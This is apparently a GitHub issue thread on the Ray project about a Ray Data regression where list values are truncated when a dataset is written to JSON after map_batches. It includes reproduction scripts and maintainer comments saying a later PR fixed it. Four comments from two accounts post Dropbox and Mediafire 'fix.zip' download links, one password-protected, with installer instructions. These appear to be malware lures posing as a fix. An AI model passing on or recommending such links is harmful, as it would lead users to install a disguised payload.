### ISSUE TITLE
[Data] Regression in handling list values when serializing to JSON due to use of Ray ExtensionDtypes

### ISSUE THREAD

**Issue by marwan116** [ray-project/ray#47327] opened 2024-08-26 03:22 UTC
### What happened + What you expected to happen

I am bumping into a regression which seems like a bug to me due to the introduction of [this code change](https://github.com/ray-project/ray/commit/ea452c9d2f31d25c7783d82c6df742c8f69bf006) in Ray 2.33.0 from what I can tell

The behavior of `write_json` has regressed from properly respecting python objects like list, to now truncating a list into its first element only.

See the reproduction script below.

Note the warning:
```
(MapBatches(<lambda>) pid=15155) Failed to interpret embeddings as multi-dimensional arrays. It will be pickled.
```
And note how the embeddings get truncated:
```
Out[8]: '{"embeddings":1}\n{"embeddings":2}\n{"embeddings":3}\n'
```

### Versions / Dependencies

```
In [14]: sys.version
Out[14]: '3.10.11 (main, Dec 12 2023, 16:25:48) [Clang 15.0.0 (clang-1500.0.40.1)]'

In [15]: ray.__version__
Out[15]: '2.34.0'
```

### Reproduction script

```ipython
In [1]: import pandas as pd

In [2]: import ray

In [3]: df = pd.DataFrame({"embeddings": [[1,2 ,3],  [4, 5, 6], [7, 8, 9]]})

In [4]: ds = ray.data.from_pandas(df)
2024-08-25 20:11:12,981	INFO worker.py:1781 -- Started a local Ray instance.

In [5]: ds.to_pandas().dtypes
Out[5]: 
embeddings    object
dtype: object

In [6]: ds.map_batches(lambda x: x).to_pandas().dtypes
2024-08-25 20:11:27,380	INFO streaming_executor.py:108 -- Starting execution of Dataset. Full logs are in /tmp/ray/session_2024-08-25_20-11-12_379326_14679/logs/ray-data
2024-08-25 20:11:27,380	INFO streaming_executor.py:109 -- Execution plan of Dataset: InputDataBuffer[Input] -> TaskPoolMapOperator[MapBatches(<lambda>)]
[dataset]: Run `pip install tqdm` to enable progress reporting.
(MapBatches(<lambda>) pid=15155) Failed to interpret embeddings as multi-dimensional arrays. It will be pickled.
Out[6]: 
embeddings    python_object()
dtype: object

In [7]: ds.to_pandas().to_json(orient="records", lines=True)
Out[7]: '{"embeddings":[1,2,3]}\n{"embeddings":[4,5,6]}\n{"embeddings":[7,8,9]}\n'

In [8]: ds.map_batches(lambda x: x).to_pandas().to_json(orient="records", lines=True)
2024-08-25 20:11:54,752	INFO streaming_executor.py:108 -- Starting execution of Dataset. Full logs are in /tmp/ray/session_2024-08-25_20-11-12_379326_14679/logs/ray-data
2024-08-25 20:11:54,752	INFO streaming_executor.py:109 -- Execution plan of Dataset: InputDataBuffer[Input] -> TaskPoolMapOperator[MapBatches(<lambda>)]
Out[8]: '{"embeddings":1}\n{"embeddings":2}\n{"embeddings":3}\n'
(edited)
```

whereas with a version of ray <= 2.32.0 here is what I get:
```ipython
In [1]: import ray

In [2]: import sys

In [3]: import pandas as pd

In [4]: df = pd.DataFrame({"embeddings": [[1,2 ,3],  [4, 5, 6], [7, 8, 9]]})

In [5]: ds = ray.data.from_pandas(df)
/Users/marwan/.pyenv/versions/3.10.11/envs/test-ray-data-regression/lib/python3.10/site-packages/numpy/_core/fromnumeric.py:57: FutureWarning: 'DataFrame.swapaxes' is deprecated and will be removed in a future version. Please use 'DataFrame.transpose' instead.
  return bound(*args, **kwds)
ds.m2024-08-25 20:14:56,409	INFO worker.py:1788 -- Started a local Ray instance.
ap
In [6]: ds.map_batches(lambda x: x).to_pandas().to_json(orient="records", lines=True)
2024-08-25 20:15:00,712	INFO streaming_executor.py:108 -- Starting execution of Dataset. Full logs are in /tmp/ray/session_2024-08-25_20-14-54_479512_19153/logs/ray-data
2024-08-25 20:15:00,713	INFO streaming_executor.py:109 -- Execution plan of Dataset: InputDataBuffer[Input] -> TaskPoolMapOperator[MapBatches(<lambda>)]
[dataset]: Run `pip install tqdm` to enable progress reporting.
Out[6]: '{"embeddings":[1,2,3]}\n{"embeddings":[4,5,6]}\n{"embeddings":[7,8,9]}\n'
```

### Issue Severity

Medium: It is a significant difficulty but I can work around it.

**Comment by Wanderx13** [comment] 2024-08-26 03:28
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment] 2024-08-26 03:29
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment] 2024-08-26 03:42
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment] 2024-08-26 04:02
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Bye-legumes** [comment] 2024-08-26 21:02
I noticed similar issue and I think the bottle neck is _concat_same_type in arrow block, https://github.com/ray-project/ray/pull/45075. Also I have PR for this but that will need to upgrade  the pyarrow version. I think this is a long time issue and we need to make decision if we should upgrade the pyarrow version so we can have better implementation for this convert part.

**Comment by richardliaw** [comment] 2024-12-03 23:07
I think this is fixed (not sure by which PR), let me check

**Comment by richardliaw** [comment] 2024-12-03 23:33
Actually it's unclear now how to reproduce this. I believe this might be an arrow issue. I can now run 
```
import ray
import pandas as pd

df = pd.DataFrame({"embeddings": [[1, 2, 3], [4, 5, 6], [7, 8, 9]]})
ds = ray.data.from_pandas(df)

print(ds.to_pandas().dtypes)

res = ds.to_pandas().to_json(orient="records", lines=True)

print(res)
```
and get
```
embeddings    object
dtype: object
{"embeddings":[1,2,3]}
{"embeddings":[4,5,6]}
{"embeddings":[7,8,9]}
```

I will close this for now but if we end up seeing another issue we can reopen (or open a new issue)

**Comment by richardliaw** [comment] 2024-12-04 02:40
OK did a double check / bisect. So far on looks like this is addressed https://github.com/ray-project/ray/pull/48487.

```python
import ray
import pandas as pd
ray.init(include_dashboard=False)

df = pd.DataFrame({"embeddings": [[1, 2, 3], [4, 5, 6], [7, 8, 9]]})
ds = ray.data.from_pandas(df)

def check(df):
    return df

ds = ds.map_batches(check)
print("Final result")
df = ds.to_pandas()
res = df.to_json(orient="records", lines=True)
print(res)
```

```
'pandas.core.series.Series'> object

{"embeddings":[1,2,3]}
{"embeddings":[4,5,6]}
{"embeddings":[7,8,9]}
```

Great thanks to @alexeykudinkin for fixing this one on the way.

**Closed by richardliaw** 2024-12-04 02:40 UTC
Labels: bug, P0, data
